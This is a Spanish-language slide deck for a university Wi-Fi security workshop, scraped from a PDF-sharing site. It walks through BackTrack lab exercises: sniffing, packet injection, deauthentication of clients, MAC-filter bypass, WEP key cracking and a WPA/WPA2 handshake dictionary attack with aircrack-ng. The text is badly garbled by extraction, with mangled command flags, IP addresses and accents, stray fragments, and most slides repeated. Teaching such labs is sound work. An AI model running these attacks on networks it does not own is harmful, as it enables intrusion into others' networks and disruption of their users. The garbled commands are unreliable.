7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094
Vulnerabilidad
bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
